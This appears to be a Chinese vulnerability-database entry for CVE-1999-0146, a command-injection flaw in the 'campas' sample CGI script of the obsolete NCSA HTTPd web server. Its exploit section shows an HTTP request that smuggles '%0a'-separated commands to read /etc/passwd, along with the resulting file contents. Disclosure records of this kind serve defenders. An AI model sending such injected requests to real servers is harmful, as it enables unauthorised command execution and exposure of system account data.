NCSA HTTPd样本脚本漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105319 漏洞类型 输入验证
发布时间 1997-07-15 更新时间 2006-11-16
CVE编号 CVE-1999-0146 CNNVD-ID CNNVD-199707-024
漏洞平台 CGI CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/20423
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199707-024
|漏洞详情
提供一些NCSAweb服务器的campasCGI程序存在漏洞。攻击者可以借助查询字符串中的编码回车字符执行任意命令,正如读取密码文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/1975/info

Campas is a sample CGI script shipped with some older versions of NCSA HTTPd, an obsolete web server package. The versions that included the script could not be determined as the server is no longer maintained, but version 1.2 of the script itself is known to be vulnerable. The script fails to properly filter user supplied variables, and as a result can be used to execute commands on the host with the privileges of the web server. Commands can be passed as a variable to the script, separated by %0a (linefeed) characters. See exploit for example. Successful exploitation of this vulnerability could be used to deface the web site, read any files the server process has access to, get directory listings, and execute anything else the web server has access to. 

> telnet target 80
[...]
GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a
<PRE>
root:x:0:1:Super-User:/export/home/root:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:/bin/false
[...]
|参考资料

来源:XF
名称:http-cgi-campas(298)
链接:http://xforce.iss.net/xforce/xfdb/298
来源:BID
名称:1975
链接:http://www.securityfocus.com/bid/1975